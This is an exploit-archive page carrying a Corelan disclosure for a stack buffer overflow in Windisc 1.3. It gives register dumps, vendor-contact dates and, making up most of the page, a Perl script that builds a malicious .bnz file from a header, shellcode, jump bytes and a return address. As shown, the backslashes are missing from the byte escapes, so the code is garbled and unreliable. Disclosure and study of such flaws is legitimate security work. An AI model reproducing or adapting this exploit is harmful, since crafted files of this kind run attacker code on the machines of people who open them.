Windisc Stack BOF exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Windisc Stack BOF exploit
# Published : 2010-03-16
# Author : Rick2600
# Previous Title : VariCAD 2010-2.05 EN Local buffer overflow
# Next Title : QuickZip 4.60.019 Stack BOF - XP SP3
|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| ___/____/_/   ___/_/__,_/_/ /_/   __/___/__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              security@corelan.be |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
|                                                                  |
|                 Vulnerability Disclosure Report                  |
|                                                                  |
|------------------------------------------------------------------|

Advisory        : CORELAN-10-013
Disclosure date : March 16, 2010


0x00 : Vulnerability information
--------------------------------

[*] Product : Windisc
[*] Version : 1.3
[*] Vendor : RParris
[*] URL : http://math.exeter.edu/rparris/windisc.html
[*] Platform : Windows
[*] Type of vulnerability : Stack Buffer overflow
[*] Risk rating : Medium
[*] Issue fixed in version : Unknown
[*] Vulnerability discovered by : Rick2600
[*] Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/


0x01 : Vendor description of software
-------------------------------------
From the vendor website:
Windisc is a collection of subprograms that deal with discrete-math topics such as 
apportionment, voting power, voting methods, and network analysis 
(traveling salesman problem, map-coloring, etc).


0x02 : Vulnerability details
----------------------------
In order to trigger the vulnerability a user needs to load a crafted Banzhaf (.bnz) file.

EAX 00A193BC
ECX 0000000B
EDX 00A193BC
EBX 00A16638
ESP 0012F778 ASCII "AAAAAAAAAAAAAAAAAA..."
EBP 41414141
ESI 00A4D158
EDI 0000000C
EIP 41414141



0x03 : Vendor communication
---------------------------
[*] Feb 15 2010: Author contacted (no replies)
[*] Mar 08 2010: Vulnerability disclosed


0x04 : Exploit/PoC
------------------
Note : you are not allowed to edit/modify this code.  
If you do, Corelan cannot be held responsible for any damages this may cause.


print "|------------------------------------------------------------------|n";
print "|                         __               __                      |n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |n";
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |n";
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |n";
print "|                                                                  |n";
print "|                                       http://www.corelan.be:8800 |n";
print "|                                                                  |n";
print "|-------------------------------------------------[ EIP Hunters ]--|nn";
print "[+] PEAnut Discrete Math Package Exploitn";

my $sploitfile="windisc_poc.bnz";

my $header=
"x77x03x00x00x03x00x00x00x36x00x00x00x3bx00x00x00".
"x50x03x00x00x3cx02x00x00x00x00x00x00x01x00x00x00".
"x3dx00x00x00xd9xffxffxffx2cx01x00x00x64x00x00x00".
"x64x00x00x00x00x00x00x00x00x00x00x00x0ax00x00x00".
"x0fx00x00x00x2bxd0x28x01x49x1ex29x01x00x00x00x00".
"x0cx00x00x00x0ax00x00x00x0ax00x00x00x08x00x00x00".
"x0cx00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00".
"x0ax00x00x00x0ax00x00x00xf0xffxffxffx00x00x00x00".
"x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00".
"x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00".
"x00x00x00x00x90x01x00x00x00x00x00x02x08x02x01x31".
"x53x79x6dx62x6fx6cx00x20x4ex65x77x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00".
"x90x01x00x00x00x00x00x00x08x02x01x31x43x6fx75x72".
"x69x65x72x20x4ex65x77x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00xf5xffxffxff".
"x00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00".
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20".
"x4ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00xf0xffxffxffx00x00x00x00".
"x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00".
"x08x02x01x02x54x69x6dx65x73x00x72x20x4ex65x77x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00".
"x00x00x00x00x90x01x00x00x00x00x00x00x08x02x01x02".
"x54x69x6dx65x73x00x72x20x4ex65x77x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00".
"x90x01x00x00x00x00x00x00x08x02x01x31x43x6fx75x72".
"x69x65x72x20x4ex65x77x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00xf3xffxffxff".
"x00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00".
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20".
"x4ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00xf3xffxffxffx00x00x00x00".
"x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00".
"x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00".
"x00x00x00x00x90x01x00x00x00x00x00x00x08x02x01x31".
"x43x6fx75x72x69x65x72x20x4ex65x77x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x24xf9x12x00x91x74x49x00".
"x1cx83x4bx00x00x00x00x00x00x24xf9x12x00x91x74x49".
"x00x1cx83x4bx00x00x00x00x00x00x24xf9x12x00x91x74".
"x49x00x1cx83x4bx00x00x00x00x00x00x24xf9x12x00x91".
"x74x49x00x1cx83x4bx00x00x00x00x00x00x13x00x13x00".
"x13x00x13x00x13x00x13x00x13x00x04x00x00x00x06x00".
"x13x00x13x00x13x00x13x00x13x00x00x00x00x00xffxff".
"xffx00xffx00xffx00xffxffx00x00xffx00x00x00x00xbf".
"x3fx00x00x00xffx00x00x7fx7fx00xffx7fx00x00xffx00".
"x7fx00xa0x2fx00x00x00xffxffx00xbfxbfx7fx00x7fx00".
"x7fx00x20xffx00x00xffx7fx7fx00x87x87x00x00x00x3c".
"xa0x00xe0xe0xe0x00xc0xc0xc0x00xa0xa0xa0x00x80x80".
"x80x00x60x60x60x00x40x40x40x00xbfx00x3fx00x7exde".
"xffx00xffxccxccx00xffx7exdex00xffxdex7ex00xdexff".
"x7ex00x7exffxdex00xffxffxbfx00xffxbfxffx00xbfxff".
"xffx00xffxffxdex00xffxdexffx00xdexffxffx00xb1xde".
"xd4x00xb1xd4xdex00xd4xb1xdex00xd4xdexb1x00xdexb1".
"xd4x00xdexd4xb1x00xbfxf1xdex00xbfxdexf1x00xdexf1".
"xbfx00xdexbfxf1x00xf1xdexbfx00xf1xbfxdex00xffx96".
"xeax00x96xeaxffx00xccxccxccx00xc8x70x00x00xdexcd".
"x00x00xdex68x20x00x14x82x28x00xc0x00xa0x00xd4x28".
"x28x00x50x84xb0x00x64xa0xc8x00x14x64x14x00x0cx00".
"x00x00x07x00x00x00xffxffxffxffx01x00x00x00x00x00".
"x00x00xffxffxffxffxffxffxffxffxb1x00x00x00x05x00".
"x00x00x32x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x0bx00x00x00x16x00x00x00x2fx00".
"x00x00x24x00x00x00x1ex00x00x00x24x00x00x00x2dx00".
"x00x00x20x00x00x00x23x00x00x00x11x00x00x00x1fx00".
"x00x00x0bx00x00x00x07x00";


#MsgBox Corelan Team
my $shellcode=
"x2bxc9xdbxcaxb1x4bxd9x74x24xf4x5axbfxc8xac" .
"x87x72x31x7ax16x83xeaxfcx03x7axdax4ex72x24" .
"xebx4ex4cx12xb8x7fxcbx2fxbdxf4x53x3cx4ax4a" .
"x40x6cx12xc0x6exdcxf4x5dx68x57x48x72x2bx8e" .
"xdax72xd3x50xbaxf9xbfx74x1ex75x7ax49xd5xdd" .
"x80xc9xe8x37x01x63xf2x4cx4cx54x03xb8x92xa3" .
"x4axb5x61x47x4dx27xb8xa8x7cx77x47xfaxfaxb7" .
"xccx09xc3xf7x20x0fx04xeexcaxf0x75x0ex17x73" .
"xadxd9x1dx55x26x43xfax68xd3x12x89x67x68x50" .
"xd7x6bx6fx8dx63x97xe4x50x9cx11xbex76x40x43" .
"xfdxdax28xd1xe9x82x36x2ax16x45xcfx54x2cx5e" .
"xd0x56xacxdex17x52xacxe0x97x62x62x95x71x57" .
"x92x10x7ex58x62xe8x0dx3dx10x21xc0x93xb0x29" .
"x48xecxd0x92x90xecx20x5dxdexe2xccx1fx07x18" .
"x7fx08x84xddx7fxc8x43x7fx32x74x12x6cxc4x84" .
"x15x6dx5dx61x9cxafxb4xb1x60xd0xb9x18x12x52" .
"x41x2cxddx2cx88x26x1ex2fx0axdfx81xd0xf5xe0" .
"x57x9bxf6xe0x57x1bx5dx1bx21x26xb4xebxcex58" .
"xb9xb2x9dxf7x17xa3xe8x08x68xccxfcxe2x96x33" .
"xffx57x7fx29xffx67x7fx17xcexb5x2dxf4x61x68" .
"x2ex2axb0x4cx80x34xe6x44xc8x2dxf6xaaxf7xe2" .
"x7ex3bx62x67x81x2bx8dx98x7ex54x0ex08xf3xce" .
"xfcxb7x9dx30xa8x52x03x5cx70xedxb4xf0x15x69" .
"x3bx07";


print "[+] Preparing payloadn";

my $payload = $header;
$payload .= "A" x 300;
$payload .= $shellcode;
$payload .= "B" x (772 - length($shellcode));
$payload .= "xE9xB9xFCxFFxFF";
$payload .= "xEBxF9x90x90";
$payload .= pack("V", 0x00405437);

print "[+] Writing payload to filen";

open(FILE,">$sploitfile");
binmode (FILE);
print FILE $payload;
close(FILE);
print "[+] Wrote ".length($payload)." bytes to file $sploitfilen";